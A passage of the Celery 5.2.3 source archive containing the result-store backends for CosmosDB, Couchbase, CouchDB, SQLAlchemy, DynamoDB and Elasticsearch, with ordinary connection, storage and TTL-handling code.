If this is the first call to the property, the client is created and the database and collection are initialized if they don't yet exist. """ connection_policy = ConnectionPolicy() connection_policy.RetryOptions = RetryOptions( max_retry_attempt_count=self._max_retry_attempts, max_wait_time_in_seconds=self._max_retry_wait_time) client = DocumentClient( self._endpoint, {"masterKey": self._key}, connection_policy=connection_policy, consistency_level=self._consistency_level) self._create_database_if_not_exists(client) self._create_collection_if_not_exists(client) return client def _create_database_if_not_exists(self, client): try: client.CreateDatabase({"id": self._database_name}) except HTTPFailure as ex: if ex.status_code != ERROR_EXISTS: raise else: LOGGER.info("Created CosmosDB database %s", self._database_name) def _create_collection_if_not_exists(self, client): try: client.CreateCollection( self._database_link, {"id": self._collection_name, "partitionKey": {"paths": ["/id"], "kind": PartitionKind.Hash}}) except HTTPFailure as ex: if ex.status_code != ERROR_EXISTS: raise else: LOGGER.info("Created CosmosDB collection %s/%s", self._database_name, self._collection_name) @cached_property def _database_link(self): return "dbs/" + self._database_name @cached_property def _collection_link(self): return self._database_link + "/colls/" + self._collection_name def _get_document_link(self, key): return self._collection_link + "/docs/" + key @classmethod def _get_partition_key(cls, key): if not key or key.isspace(): raise ValueError("Key cannot be none, empty or whitespace.") return {"partitionKey": key} def get(self, key): """Read the value stored at the given key. Args: key: The key for which to read the value. """ key = bytes_to_str(key) LOGGER.debug("Getting CosmosDB document %s/%s/%s", self._database_name, self._collection_name, key) try: document = self._client.ReadDocument( self._get_document_link(key), self._get_partition_key(key)) except HTTPFailure as ex: if ex.status_code != ERROR_NOT_FOUND: raise return None else: return document.get("value") def set(self, key, value): """Store a value for a given key. Args: key: The key at which to store the value. value: The value to store. """ key = bytes_to_str(key) LOGGER.debug("Creating CosmosDB document %s/%s/%s", self._database_name, self._collection_name, key) self._client.CreateDocument( self._collection_link, {"id": key, "value": value}, self._get_partition_key(key)) def mget(self, keys): """Read all the values for the provided keys. Args: keys: The list of keys to read. """ return [self.get(key) for key in keys] def delete(self, key): """Delete the value at a given key. Args: key: The key of the value to delete. """ key = bytes_to_str(key) LOGGER.debug("Deleting CosmosDB document %s/%s/%s", self._database_name, self._collection_name, key) self._client.DeleteDocument( self._get_document_link(key), self._get_partition_key(key)) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/backends/couchbase.py0000664000175000017500000000614500000000000020246 0ustar00asifasif00000000000000"""Couchbase result store backend.""" from kombu.utils.url import _parse_url from celery.exceptions import ImproperlyConfigured from .base import KeyValueStoreBackend try: from couchbase.auth import PasswordAuthenticator from couchbase.cluster import Cluster, ClusterOptions from couchbase_core._libcouchbase import FMT_AUTO except ImportError: Cluster = PasswordAuthenticator = ClusterOptions = None __all__ = ('CouchbaseBackend',) class CouchbaseBackend(KeyValueStoreBackend): """Couchbase backend. Raises: celery.exceptions.ImproperlyConfigured: if module :pypi:`couchbase` is not available. """ bucket = 'default' host = 'localhost' port = 8091 username = None password = None quiet = False supports_autoexpire = True timeout = 2.5 # Use str as couchbase key not bytes key_t = str def __init__(self, url=None, *args, **kwargs): kwargs.setdefault('expires_type', int) super().__init__(*args, **kwargs) self.url = url if Cluster is None: raise ImproperlyConfigured( 'You need to install the couchbase library to use the ' 'Couchbase backend.', ) uhost = uport = uname = upass = ubucket = None if url: _, uhost, uport, uname, upass, ubucket, _ = _parse_url(url) ubucket = ubucket.strip('/') if ubucket else None config = self.app.conf.get('couchbase_backend_settings', None) if config is not None: if not isinstance(config, dict): raise ImproperlyConfigured( 'Couchbase backend settings should be grouped in a dict', ) else: config = {} self.host = uhost or config.get('host', self.host) self.port = int(uport or config.get('port', self.port)) self.bucket = ubucket or config.get('bucket', self.bucket) self.username = uname or config.get('username', self.username) self.password = upass or config.get('password', self.password) self._connection = None def _get_connection(self): """Connect to the Couchbase server.""" if self._connection is None: if self.host and self.port: uri = f"couchbase://{self.host}:{self.port}" else: uri = f"couchbase://{self.host}" if self.username and self.password: opt = PasswordAuthenticator(self.username, self.password) else: opt = None cluster = Cluster(uri, opt) bucket = cluster.bucket(self.bucket) self._connection = bucket.default_collection() return self._connection @property def connection(self): return self._get_connection() def get(self, key): return self.connection.get(key).content def set(self, key, value): self.connection.upsert(key, value, ttl=self.expires, format=FMT_AUTO) def mget(self, keys): return self.connection.get_multi(keys) def delete(self, key): self.connection.remove(key) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/backends/couchdb.py0000664000175000017500000000556700000000000017730 0ustar00asifasif00000000000000"""CouchDB result store backend.""" from kombu.utils.encoding import bytes_to_str from kombu.utils.url import _parse_url from celery.exceptions import ImproperlyConfigured from .base import KeyValueStoreBackend try: import pycouchdb except ImportError: pycouchdb = None __all__ = ('CouchBackend',) ERR_LIB_MISSING = """\ You need to install the pycouchdb library to use the CouchDB result backend\ """ class CouchBackend(KeyValueStoreBackend): """CouchDB backend. Raises: celery.exceptions.ImproperlyConfigured: if module :pypi:`pycouchdb` is not available. """ container = 'default' scheme = 'http' host = 'localhost' port = 5984 username = None password = None def __init__(self, url=None, *args, **kwargs): super().__init__(*args, **kwargs) self.url = url if pycouchdb is None: raise ImproperlyConfigured(ERR_LIB_MISSING) uscheme = uhost = uport = uname = upass = ucontainer = None if url: _, uhost, uport, uname, upass, ucontainer, _ = _parse_url(url) ucontainer = ucontainer.strip('/') if ucontainer else None self.scheme = uscheme or self.scheme self.host = uhost or self.host self.port = int(uport or self.port) self.container = ucontainer or self.container self.username = uname or self.username self.password = upass or self.password self._connection = None def _get_connection(self): """Connect to the CouchDB server.""" if self.username and self.password: conn_string = f'{self.scheme}://{self.username}:{self.password}@{self.host}:{self.port}' server = pycouchdb.Server(conn_string, authmethod='basic') else: conn_string = f'{self.scheme}://{self.host}:{self.port}' server = pycouchdb.Server(conn_string) try: return server.database(self.container) except pycouchdb.exceptions.NotFound: return server.create(self.container) @property def connection(self): if self._connection is None: self._connection = self._get_connection() return self._connection def get(self, key): key = bytes_to_str(key) try: return self.connection.get(key)['value'] except pycouchdb.exceptions.NotFound: return None def set(self, key, value): key = bytes_to_str(key) data = {'_id': key, 'value': value} try: self.connection.save(data) except pycouchdb.exceptions.Conflict: # document already exists, update it data = self.connection.get(key) data['value'] = value self.connection.save(data) def mget(self, keys): return [self.get(key) for key in keys] def delete(self, key): self.connection.delete(key) ././@PaxHeader0000000000000000000000000000003400000000000011452 xustar000000000000000028 mtime=1640757094.4037497 celery-5.2.3/celery/backends/database/0000775000175000017500000000000000000000000017476 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/backends/database/__init__.py0000664000175000017500000001713300000000000021614 0ustar00asifasif00000000000000"""SQLAlchemy result store backend.""" import logging from contextlib import contextmanager from vine.utils import wraps from celery import states from celery.backends.base import BaseBackend from celery.exceptions import ImproperlyConfigured from celery.utils.time import maybe_timedelta from .models import Task, TaskExtended, TaskSet from .session import SessionManager try: from sqlalchemy.exc import DatabaseError, InvalidRequestError from sqlalchemy.orm.exc import StaleDataError except ImportError: # pragma: no cover raise ImproperlyConfigured( 'The database result backend requires SQLAlchemy to be installed.' 'See https://pypi.org/project/SQLAlchemy/') logger = logging.getLogger(__name__) __all__ = ('DatabaseBackend',) @contextmanager def session_cleanup(session): try: yield except Exception: session.rollback() raise finally: session.close() def retry(fun): @wraps(fun) def _inner(*args, **kwargs): max_retries = kwargs.pop('max_retries', 3) for retries in range(max_retries): try: return fun(*args, **kwargs) except (DatabaseError, InvalidRequestError, StaleDataError): logger.warning( 'Failed operation %s. Retrying %s more times.', fun.__name__, max_retries - retries - 1, exc_info=True) if retries + 1 >= max_retries: raise return _inner class DatabaseBackend(BaseBackend): """The database result backend.""" # ResultSet.iterate should sleep this much between each pool, # to not bombard the database with queries. subpolling_interval = 0.5 task_cls = Task taskset_cls = TaskSet def __init__(self, dburi=None, engine_options=None, url=None, **kwargs): # The `url` argument was added later and is used by # the app to set backend by url (celery.app.backends.by_url) super().__init__(expires_type=maybe_timedelta, url=url, **kwargs) conf = self.app.conf if self.extended_result: self.task_cls = TaskExtended self.url = url or dburi or conf.database_url self.engine_options = dict( engine_options or {}, **conf.database_engine_options or {}) self.short_lived_sessions = kwargs.get( 'short_lived_sessions', conf.database_short_lived_sessions) schemas = conf.database_table_schemas or {} tablenames = conf.database_table_names or {} self.task_cls.configure( schema=schemas.get('task'), name=tablenames.get('task')) self.taskset_cls.configure( schema=schemas.get('group'), name=tablenames.get('group')) if not self.url: raise ImproperlyConfigured( 'Missing connection string! Do you have the' ' database_url setting set to a real value?') @property def extended_result(self): return self.app.conf.find_value_for_key('extended', 'result') def ResultSession(self, session_manager=SessionManager()): return session_manager.session_factory( dburi=self.url, short_lived_sessions=self.short_lived_sessions, **self.engine_options) @retry def _store_result(self, task_id, result, state, traceback=None, request=None, **kwargs): """Store return value and state of an executed task.""" session = self.ResultSession() with session_cleanup(session): task = list(session.query(self.task_cls).filter(self.task_cls.task_id == task_id)) task = task and task[0] if not task: task = self.task_cls(task_id) task.task_id = task_id session.add(task) session.flush() self._update_result(task, result, state, traceback=traceback, request=request) session.commit() def _update_result(self, task, result, state, traceback=None, request=None): meta = self._get_result_meta(result=result, state=state, traceback=traceback, request=request, format_date=False, encode=True) # Exclude the primary key id and task_id columns # as we should not set it None columns = [column.name for column in self.task_cls.__table__.columns if column.name not in {'id', 'task_id'}] # Iterate through the columns name of the table # to set the value from meta. # If the value is not present in meta, set None for column in columns: value = meta.get(column) setattr(task, column, value) @retry def _get_task_meta_for(self, task_id): """Get task meta-data for a task by id.""" session = self.ResultSession() with session_cleanup(session): task = list(session.query(self.task_cls).filter(self.task_cls.task_id == task_id)) task = task and task[0] if not task: task = self.task_cls(task_id) task.status = states.PENDING task.result = None data = task.to_dict() if data.get('args', None) is not None: data['args'] = self.decode(data['args']) if data.get('kwargs', None) is not None: data['kwargs'] = self.decode(data['kwargs']) return self.meta_from_decoded(data) @retry def _save_group(self, group_id, result): """Store the result of an executed group.""" session = self.ResultSession() with session_cleanup(session): group = self.taskset_cls(group_id, result) session.add(group) session.flush() session.commit() return result @retry def _restore_group(self, group_id): """Get meta-data for group by id.""" session = self.ResultSession() with session_cleanup(session): group = session.query(self.taskset_cls).filter( self.taskset_cls.taskset_id == group_id).first() if group: return group.to_dict() @retry def _delete_group(self, group_id): """Delete meta-data for group by id.""" session = self.ResultSession() with session_cleanup(session): session.query(self.taskset_cls).filter( self.taskset_cls.taskset_id == group_id).delete() session.flush() session.commit() @retry def _forget(self, task_id): """Forget about result.""" session = self.ResultSession() with session_cleanup(session): session.query(self.task_cls).filter(self.task_cls.task_id == task_id).delete() session.commit() def cleanup(self): """Delete expired meta-data.""" session = self.ResultSession() expires = self.expires now = self.app.now() with session_cleanup(session): session.query(self.task_cls).filter( self.task_cls.date_done < (now - expires)).delete() session.query(self.taskset_cls).filter( self.taskset_cls.date_done < (now - expires)).delete() session.commit() def __reduce__(self, args=(), kwargs=None): kwargs = {} if not kwargs else kwargs kwargs.update( {'dburi': self.url, 'expires': self.expires, 'engine_options': self.engine_options}) return super().__reduce__(args, kwargs) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/backends/database/models.py0000664000175000017500000000642700000000000021344 0ustar00asifasif00000000000000"""Database models used by the SQLAlchemy result store backend.""" from datetime import datetime import sqlalchemy as sa from sqlalchemy.types import PickleType from celery import states from .session import ResultModelBase __all__ = ('Task', 'TaskExtended', 'TaskSet') class Task(ResultModelBase): """Task result/status.""" __tablename__ = 'celery_taskmeta' __table_args__ = {'sqlite_autoincrement': True} id = sa.Column(sa.Integer, sa.Sequence('task_id_sequence'), primary_key=True, autoincrement=True) task_id = sa.Column(sa.String(155), unique=True) status = sa.Column(sa.String(50), default=states.PENDING) result = sa.Column(PickleType, nullable=True) date_done = sa.Column(sa.DateTime, default=datetime.utcnow, onupdate=datetime.utcnow, nullable=True) traceback = sa.Column(sa.Text, nullable=True) def __init__(self, task_id): self.task_id = task_id def to_dict(self): return { 'task_id': self.task_id, 'status': self.status, 'result': self.result, 'traceback': self.traceback, 'date_done': self.date_done, } def __repr__(self): return ''.format(self) @classmethod def configure(cls, schema=None, name=None): cls.__table__.schema = schema cls.id.default.schema = schema cls.__table__.name = name or cls.__tablename__ class TaskExtended(Task): """For the extend result.""" __tablename__ = 'celery_taskmeta' __table_args__ = {'sqlite_autoincrement': True, 'extend_existing': True} name = sa.Column(sa.String(155), nullable=True) args = sa.Column(sa.LargeBinary, nullable=True) kwargs = sa.Column(sa.LargeBinary, nullable=True) worker = sa.Column(sa.String(155), nullable=True) retries = sa.Column(sa.Integer, nullable=True) queue = sa.Column(sa.String(155), nullable=True) def to_dict(self): task_dict = super().to_dict() task_dict.update({ 'name': self.name, 'args': self.args, 'kwargs': self.kwargs, 'worker': self.worker, 'retries': self.retries, 'queue': self.queue, }) return task_dict class TaskSet(ResultModelBase): """TaskSet result.""" __tablename__ = 'celery_tasksetmeta' __table_args__ = {'sqlite_autoincrement': True} id = sa.Column(sa.Integer, sa.Sequence('taskset_id_sequence'), autoincrement=True, primary_key=True) taskset_id = sa.Column(sa.String(155), unique=True) result = sa.Column(PickleType, nullable=True) date_done = sa.Column(sa.DateTime, default=datetime.utcnow, nullable=True) def __init__(self, taskset_id, result): self.taskset_id = taskset_id self.result = result def to_dict(self): return { 'taskset_id': self.taskset_id, 'result': self.result, 'date_done': self.date_done, } def __repr__(self): return f'' @classmethod def configure(cls, schema=None, name=None): cls.__table__.schema = schema cls.id.default.schema = schema cls.__table__.name = name or cls.__tablename__ ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/backends/database/session.py0000664000175000017500000000570300000000000021540 0ustar00asifasif00000000000000"""SQLAlchemy session.""" import time from kombu.utils.compat import register_after_fork from sqlalchemy import create_engine from sqlalchemy.exc import DatabaseError from sqlalchemy.orm import sessionmaker from sqlalchemy.pool import NullPool from celery.utils.time import get_exponential_backoff_interval try: from sqlalchemy.orm import declarative_base except ImportError: # TODO: Remove this once we drop support for SQLAlchemy < 1.4. from sqlalchemy.ext.declarative import declarative_base ResultModelBase = declarative_base() __all__ = ('SessionManager',) PREPARE_MODELS_MAX_RETRIES = 10 def _after_fork_cleanup_session(session): session._after_fork() class SessionManager: """Manage SQLAlchemy sessions.""" def __init__(self): self._engines = {} self._sessions = {} self.forked = False self.prepared = False if register_after_fork is not None: register_after_fork(self, _after_fork_cleanup_session) def _after_fork(self): self.forked = True def get_engine(self, dburi, **kwargs): if self.forked: try: return self._engines[dburi] except KeyError: engine = self._engines[dburi] = create_engine(dburi, **kwargs) return engine else: kwargs = {k: v for k, v in kwargs.items() if not k.startswith('pool')} return create_engine(dburi, poolclass=NullPool, **kwargs) def create_session(self, dburi, short_lived_sessions=False, **kwargs): engine = self.get_engine(dburi, **kwargs) if self.forked: if short_lived_sessions or dburi not in self._sessions: self._sessions[dburi] = sessionmaker(bind=engine) return engine, self._sessions[dburi] return engine, sessionmaker(bind=engine) def prepare_models(self, engine): if not self.prepared: # SQLAlchemy will check if the items exist before trying to # create them, which is a race condition. If it raises an error # in one iteration, the next may pass all the existence checks # and the call will succeed. retries = 0 while True: try: ResultModelBase.metadata.create_all(engine) except DatabaseError: if retries < PREPARE_MODELS_MAX_RETRIES: sleep_amount_ms = get_exponential_backoff_interval( 10, retries, 1000, True ) time.sleep(sleep_amount_ms / 1000) retries += 1 else: raise else: break self.prepared = True def session_factory(self, dburi, **kwargs): engine, session = self.create_session(dburi, **kwargs) self.prepare_models(engine) return session() ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/backends/dynamodb.py0000664000175000017500000004154600000000000020113 0ustar00asifasif00000000000000"""AWS DynamoDB result store backend.""" from collections import namedtuple from time import sleep, time from kombu.utils.url import _parse_url as parse_url from celery.exceptions import ImproperlyConfigured from celery.utils.log import get_logger from .base import KeyValueStoreBackend try: import boto3 from botocore.exceptions import ClientError except ImportError: # pragma: no cover boto3 = ClientError = None __all__ = ('DynamoDBBackend',) # Helper class that describes a DynamoDB attribute DynamoDBAttribute = namedtuple('DynamoDBAttribute', ('name', 'data_type')) logger = get_logger(__name__) class DynamoDBBackend(KeyValueStoreBackend): """AWS DynamoDB result backend. Raises: celery.exceptions.ImproperlyConfigured: if module :pypi:`boto3` is not available. """ #: default DynamoDB table name (`default`) table_name = 'celery' #: Read Provisioned Throughput (`default`) read_capacity_units = 1 #: Write Provisioned Throughput (`default`) write_capacity_units = 1 #: AWS region (`default`) aws_region = None #: The endpoint URL that is passed to boto3 (local DynamoDB) (`default`) endpoint_url = None #: Item time-to-live in seconds (`default`) time_to_live_seconds = None # DynamoDB supports Time to Live as an auto-expiry mechanism. supports_autoexpire = True _key_field = DynamoDBAttribute(name='id', data_type='S') _value_field = DynamoDBAttribute(name='result', data_type='B') _timestamp_field = DynamoDBAttribute(name='timestamp', data_type='N') _ttl_field = DynamoDBAttribute(name='ttl', data_type='N') _available_fields = None def __init__(self, url=None, table_name=None, *args, **kwargs): super().__init__(*args, **kwargs) self.url = url self.table_name = table_name or self.table_name if not boto3: raise ImproperlyConfigured( 'You need to install the boto3 library to use the ' 'DynamoDB backend.') aws_credentials_given = False aws_access_key_id = None aws_secret_access_key = None if url is not None: scheme, region, port, username, password, table, query = \ parse_url(url) aws_access_key_id = username aws_secret_access_key = password access_key_given = aws_access_key_id is not None secret_key_given = aws_secret_access_key is not None if access_key_given != secret_key_given: raise ImproperlyConfigured( 'You need to specify both the Access Key ID ' 'and Secret.') aws_credentials_given = access_key_given if region == 'localhost': # We are using the downloadable, local version of DynamoDB self.endpoint_url = f'http://localhost:{port}' self.aws_region = 'us-east-1' logger.warning( 'Using local-only DynamoDB endpoint URL: {}'.format( self.endpoint_url ) ) else: self.aws_region = region # If endpoint_url is explicitly set use it instead _get = self.app.conf.get config_endpoint_url = _get('dynamodb_endpoint_url') if config_endpoint_url: self.endpoint_url = config_endpoint_url self.read_capacity_units = int( query.get( 'read', self.read_capacity_units ) ) self.write_capacity_units = int( query.get( 'write', self.write_capacity_units ) ) ttl = query.get('ttl_seconds', self.time_to_live_seconds) if ttl: try: self.time_to_live_seconds = int(ttl) except ValueError as e: logger.error( 'TTL must be a number; got "{ttl}"', exc_info=e ) raise e self.table_name = table or self.table_name self._available_fields = ( self._key_field, self._value_field, self._timestamp_field ) self._client = None if aws_credentials_given: self._get_client( access_key_id=aws_access_key_id, secret_access_key=aws_secret_access_key ) def _get_client(self, access_key_id=None, secret_access_key=None): """Get client connection.""" if self._client is None: client_parameters = { 'region_name': self.aws_region } if access_key_id is not None: client_parameters.update({ 'aws_access_key_id': access_key_id, 'aws_secret_access_key': secret_access_key }) if self.endpoint_url is not None: client_parameters['endpoint_url'] = self.endpoint_url self._client = boto3.client( 'dynamodb', **client_parameters ) self._get_or_create_table() if self._has_ttl() is not None: self._validate_ttl_methods() self._set_table_ttl() return self._client def _get_table_schema(self): """Get the boto3 structure describing the DynamoDB table schema.""" return { 'AttributeDefinitions': [ { 'AttributeName': self._key_field.name, 'AttributeType': self._key_field.data_type } ], 'TableName': self.table_name, 'KeySchema': [ { 'AttributeName': self._key_field.name, 'KeyType': 'HASH' } ], 'ProvisionedThroughput': { 'ReadCapacityUnits': self.read_capacity_units, 'WriteCapacityUnits': self.write_capacity_units } } def _get_or_create_table(self): """Create table if not exists, otherwise return the description.""" table_schema = self._get_table_schema() try: table_description = self._client.create_table(**table_schema) logger.info( 'DynamoDB Table {} did not exist, creating.'.format( self.table_name ) ) # In case we created the table, wait until it becomes available. self._wait_for_table_status('ACTIVE') logger.info( 'DynamoDB Table {} is now available.'.format( self.table_name ) ) return table_description except ClientError as e: error_code = e.response['Error'].get('Code', 'Unknown') # If table exists, do not fail, just return the description. if error_code == 'ResourceInUseException': return self._client.describe_table( TableName=self.table_name ) else: raise e def _has_ttl(self): """Return the desired Time to Live config. - True: Enable TTL on the table; use expiry. - False: Disable TTL on the table; don't use expiry. - None: Ignore TTL on the table; don't use expiry. """ return None if self.time_to_live_seconds is None \ else self.time_to_live_seconds >= 0 def _validate_ttl_methods(self): """Verify boto support for the DynamoDB Time to Live methods.""" # Required TTL methods. required_methods = ( 'update_time_to_live', 'describe_time_to_live', ) # Find missing methods. missing_methods = [] for method in list(required_methods): if not hasattr(self._client, method): missing_methods.append(method) if missing_methods: logger.error( ( 'boto3 method(s) {methods} not found; ensure that ' 'boto3>=1.9.178 and botocore>=1.12.178 are installed' ).format( methods=','.join(missing_methods) ) ) raise AttributeError( 'boto3 method(s) {methods} not found'.format( methods=','.join(missing_methods) ) ) def _get_ttl_specification(self, ttl_attr_name): """Get the boto3 structure describing the DynamoDB TTL specification.""" return { 'TableName': self.table_name, 'TimeToLiveSpecification': { 'Enabled': self._has_ttl(), 'AttributeName': ttl_attr_name } } def _get_table_ttl_description(self): # Get the current TTL description. try: description = self._client.describe_time_to_live( TableName=self.table_name ) except ClientError as e: error_code = e.response['Error'].get('Code', 'Unknown') error_message = e.response['Error'].get('Message', 'Unknown') logger.error(( 'Error describing Time to Live on DynamoDB table {table}: ' '{code}: {message}' ).format( table=self.table_name, code=error_code, message=error_message, )) raise e return description def _set_table_ttl(self): """Enable or disable Time to Live on the table.""" # Get the table TTL description, and return early when possible. description = self._get_table_ttl_description() status = description['TimeToLiveDescription']['TimeToLiveStatus'] if status in ('ENABLED', 'ENABLING'): cur_attr_name = \ description['TimeToLiveDescription']['AttributeName'] if self._has_ttl(): if cur_attr_name == self._ttl_field.name: # We want TTL enabled, and it is currently enabled or being # enabled, and on the correct attribute. logger.debug(( 'DynamoDB Time to Live is {situation} ' 'on table {table}' ).format( situation='already enabled' if status == 'ENABLED' else 'currently being enabled', table=self.table_name )) return description elif status in ('DISABLED', 'DISABLING'): if not self._has_ttl(): # We want TTL disabled, and it is currently disabled or being # disabled. logger.debug(( 'DynamoDB Time to Live is {situation} ' 'on table {table}' ).format( situation='already disabled' if status == 'DISABLED' else 'currently being disabled', table=self.table_name )) return description # The state shouldn't ever have any value beyond the four handled # above, but to ease troubleshooting of potential future changes, emit # a log showing the unknown state. else: # pragma: no cover logger.warning(( 'Unknown DynamoDB Time to Live status {status} ' 'on table {table}. Attempting to continue.' ).format( status=status, table=self.table_name )) # At this point, we have one of the following situations: # # We want TTL enabled, # # - and it's currently disabled: Try to enable. # # - and it's being disabled: Try to enable, but this is almost sure to # raise ValidationException with message: # # Time to live has been modified multiple times within a fixed # interval # # - and it's currently enabling or being enabled, but on the wrong # attribute: Try to enable, but this will raise ValidationException # with message: # # TimeToLive is active on a different AttributeName: current # AttributeName is ttlx # # We want TTL disabled, # # - and it's currently enabled: Try to disable. # # - and it's being enabled: Try to disable, but this is almost sure to # raise ValidationException with message: # # Time to live has been modified multiple times within a fixed # interval # attr_name = \ cur_attr_name if status == 'ENABLED' else self._ttl_field.name try: specification = self._client.update_time_to_live( **self._get_ttl_specification( ttl_attr_name=attr_name ) ) logger.info( ( 'DynamoDB table Time to Live updated: ' 'table={table} enabled={enabled} attribute={attr}' ).format( table=self.table_name, enabled=self._has_ttl(), attr=self._ttl_field.name ) ) return specification except ClientError as e: error_code = e.response['Error'].get('Code', 'Unknown') error_message = e.response['Error'].get('Message', 'Unknown') logger.error(( 'Error {action} Time to Live on DynamoDB table {table}: ' '{code}: {message}' ).format( action='enabling' if self._has_ttl() else 'disabling', table=self.table_name, code=error_code, message=error_message, )) raise e def _wait_for_table_status(self, expected='ACTIVE'): """Poll for the expected table status.""" achieved_state = False while not achieved_state: table_description = self.client.describe_table( TableName=self.table_name ) logger.debug( 'Waiting for DynamoDB table {} to become {}.'.format( self.table_name, expected ) ) current_status = table_description['Table']['TableStatus'] achieved_state = current_status == expected sleep(1) def _prepare_get_request(self, key): """Construct the item retrieval request parameters.""" return { 'TableName': self.table_name, 'Key': { self._key_field.name: { self._key_field.data_type: key } } } def _prepare_put_request(self, key, value): """Construct the item creation request parameters.""" timestamp = time() put_request = { 'TableName': self.table_name, 'Item': { self._key_field.name: { self._key_field.data_type: key }, self._value_field.name: { self._value_field.data_type: value }, self._timestamp_field.name: { self._timestamp_field.data_type: str(timestamp) } } } if self._has_ttl(): put_request['Item'].update({ self._ttl_field.name: { self._ttl_field.data_type: str(int(timestamp + self.time_to_live_seconds)) } }) return put_request def _item_to_dict(self, raw_response): """Convert get_item() response to field-value pairs.""" if 'Item' not in raw_response: return {} return { field.name: raw_response['Item'][field.name][field.data_type] for field in self._available_fields } @property def client(self): return self._get_client() def get(self, key): key = str(key) request_parameters = self._prepare_get_request(key) item_response = self.client.get_item(**request_parameters) item = self._item_to_dict(item_response) return item.get(self._value_field.name) def set(self, key, value): key = str(key) request_parameters = self._prepare_put_request(key, value) self.client.put_item(**request_parameters) def mget(self, keys): return [self.get(key) for key in keys] def delete(self, key): key = str(key) request_parameters = self._prepare_get_request(key) self.client.delete_item(**request_parameters) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/backends/elasticsearch.py0000664000175000017500000002022300000000000021115 0ustar00asifasif00000000000000"""Elasticsearch result store backend.""" from datetime import datetime from kombu.utils.encoding import bytes_to_str from kombu.utils.url import _parse_url from celery import states from celery.exceptions import ImproperlyConfigured from .base import KeyValueStoreBackend try: import elasticsearch except ImportError: # pragma: no cover elasticsearch = None __all__ = ('ElasticsearchBackend',) E_LIB_MISSING = """\ You need to install the elasticsearch library to use the Elasticsearch \ result backend.\ """ class ElasticsearchBackend(KeyValueStoreBackend): """Elasticsearch Backend. Raises: celery.exceptions.ImproperlyConfigured: if module :pypi:`elasticsearch` is not available. """ index = 'celery' doc_type = 'backend' scheme = 'http' host = 'localhost' port = 9200 username = None password = None es_retry_on_timeout = False es_timeout = 10 es_max_retries = 3 def __init__(self, url=None, *args, **kwargs): super().__init__(*args, **kwargs) self.url = url _get = self.app.conf.get if elasticsearch is None: raise ImproperlyConfigured(E_LIB_MISSING) index = doc_type = scheme = host = port = username = password = None if url: scheme, host, port, username, password, path, _ = _parse_url(url) if scheme == 'elasticsearch': scheme = None if path: path = path.strip('/') index, _, doc_type = path.partition('/') self.index = index or self.index self.doc_type = doc_type or self.doc_type self.scheme = scheme or self.scheme self.host = host or self.host self.port = port or self.port self.username = username or self.username self.password = password or self.password self.es_retry_on_timeout = ( _get('elasticsearch_retry_on_timeout') or self.es_retry_on_timeout ) es_timeout = _get('elasticsearch_timeout') if es_timeout is not None: self.es_timeout = es_timeout es_max_retries = _get('elasticsearch_max_retries') if es_max_retries is not None: self.es_max_retries = es_max_retries self.es_save_meta_as_text = _get('elasticsearch_save_meta_as_text', True) self._server = None def exception_safe_to_retry(self, exc): if isinstance(exc, (elasticsearch.exceptions.TransportError)): # 401: Unauthorized # 409: Conflict # 429: Too Many Requests # 500: Internal Server Error # 502: Bad Gateway # 503: Service Unavailable # 504: Gateway Timeout # N/A: Low level exception (i.e. socket exception) if exc.status_code in {401, 409, 429, 500, 502, 503, 504, 'N/A'}: return True return False def get(self, key): try: res = self._get(key) try: if res['found']: return res['_source']['result'] except (TypeError, KeyError): pass except elasticsearch.exceptions.NotFoundError: pass def _get(self, key): return self.server.get( index=self.index, doc_type=self.doc_type, id=key, ) def _set_with_state(self, key, value, state): body = { 'result': value, '@timestamp': '{}Z'.format( datetime.utcnow().isoformat()[:-3] ), } try: self._index( id=key, body=body, ) except elasticsearch.exceptions.ConflictError: # document already exists, update it self._update(key, body, state) def set(self, key, value): return self._set_with_state(key, value, None) def _index(self, id, body, **kwargs): body = {bytes_to_str(k): v for k, v in body.items()} return self.server.index( id=bytes_to_str(id), index=self.index, doc_type=self.doc_type, body=body, params={'op_type': 'create'}, **kwargs ) def _update(self, id, body, state, **kwargs): """Update state in a conflict free manner. If state is defined (not None), this will not update ES server if either: * existing state is success * existing state is a ready state and current state in not a ready state This way, a Retry state cannot override a Success or Failure, and chord_unlock will not retry indefinitely. """ body = {bytes_to_str(k): v for k, v in body.items()} try: res_get = self._get(key=id) if not res_get.get('found'): return self._index(id, body, **kwargs) # document disappeared between index and get calls. except elasticsearch.exceptions.NotFoundError: return self._index(id, body, **kwargs) try: meta_present_on_backend = self.decode_result(res_get['_source']['result']) except (TypeError, KeyError): pass else: if meta_present_on_backend['status'] == states.SUCCESS: # if stored state is already in success, do nothing return {'result': 'noop'} elif meta_present_on_backend['status'] in states.READY_STATES and state in states.UNREADY_STATES: # if stored state is in ready state and current not, do nothing return {'result': 'noop'} # get current sequence number and primary term # https://www.elastic.co/guide/en/elasticsearch/reference/current/optimistic-concurrency-control.html seq_no = res_get.get('_seq_no', 1) prim_term = res_get.get('_primary_term', 1) # try to update document with current seq_no and primary_term res = self.server.update( id=bytes_to_str(id), index=self.index, doc_type=self.doc_type, body={'doc': body}, params={'if_primary_term': prim_term, 'if_seq_no': seq_no}, **kwargs ) # result is elastic search update query result # noop = query did not update any document # updated = at least one document got updated if res['result'] == 'noop': raise elasticsearch.exceptions.ConflictError(409, 'conflicting update occurred concurrently', {}) return res def encode(self, data): if self.es_save_meta_as_text: return super().encode(data) else: if not isinstance(data, dict): return super().encode(data) if data.get("result"): data["result"] = self._encode(data["result"])[2] if data.get("traceback"): data["traceback"] = self._encode(data["traceback"])[2] return data def decode(self, payload): if self.es_save_meta_as_text: return super().decode(payload) else: if not isinstance(payload, dict): return super().decode(payload) if payload.get("result"): payload["result"] = super().decode(payload["result"]) if payload.get("traceback"): payload["traceback"] = super().decode(payload["traceback"]) return payload def mget(self, keys): return [self.get(key) for key in 